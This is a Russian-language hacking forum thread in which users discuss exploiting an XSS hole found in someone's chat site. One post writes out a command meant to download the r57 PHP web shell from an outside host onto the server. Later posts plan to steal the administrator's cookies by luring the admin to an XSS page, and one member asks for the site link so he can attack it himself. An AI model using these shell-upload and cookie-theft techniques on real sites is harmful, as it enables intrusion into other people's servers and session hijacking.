|
Java Script Including ??
Привет всем нашол дыру в чате мона вставлять java script самое интересное я всегда почти дыры нахожу ))) Но вот юзать их я не умею что подскажите ? Сервер Апач 2.11 помойму система Win nt И вообще что можно вставить с помошью жава скрипт ??? кроме чтение cookies ...????
|
гениальный пост
особенно название пофигу какой версии апач стоит, пофигу какая ОС... с помощью джава скрипта ты как нистранно, можешь много что сделать, на что соображалки хватит, то и делай. А вот кукисы ты благодаря снифферу "читаешь".. java script лишь проводник |
У меня такая же проблема!!!! ПОМОГИТЕ!!! Короче я нашел vb-including. Т.е. я выполняю на системе vbscript:alert(); и он РАБОТАЕТ! Но когда я пытаюсь залить шелл vbscript:wget http://rst.void.ru/download/r57shell.txt -0 etoneshell.php он наверное ошибается и синтакс меняется! Как быть???
Люди плиз, иначе я красным писать начну! |
Java Script Including. Долго я угорал над названия темы :D
|
Охренеть........
три ответа трех мемберов с >300 почтов, а содержание "ты дурак, мы умные" Adio На будущее перед тем, как задавать вопрос, советую Вам воспользоваться поиском по форуму. Если Вы не нашли ответ на Ваш вопрос, воспользуйтесь поисковыми системами google.com или yandex.ru. Вот например полезные темы из раздела "Статьи": http://forum.antichat.ru/threadnav18872-1-10.html http://forum.antichat.ru/threadnav18719-1-10.html http://forum.antichat.ru/threadnav13949-1-10.html http://forum.antichat.ru/thread12124.html Также советую прочитать мою статью: http://www.security-teams.net/index.php?showtopic=2492 |
drmist, ни в коем случае. Я согласен, что не раскрыл тему. Какой вопрос - таков ответ.
А ты молодец. Надеюсь создателю топика эти ссылки помогут. |
Привет вот собственно и я ))) Пасибо за ссылки )) конешшно )) но у меня вопрос такой
Можно как то пробраться на сервер с помощью жава скрипт ??? потому что только жава скрипт и html распазнаёт ( так вот только кукисы мона тырить получаеться ??? Ну раз никак с помощью java script нильзя то скажите как мона тырить cookie без использование ALERT ??? тоесть типа мышкой по картинке куки в лог ? |
Если можна вставить java script то можна спырить админские кукисы...........
|
читай }{акер там по веб хаку дофига инфы.
Кста дай ссылку на етот чат, я его покалупаю маленько... |
КАк мона Стрырить Админские Кукисы ??? Заставить админа зайти на xss сраничку ? )))
Да он не дурак по ходу дела ! |
| Время: 22:07 |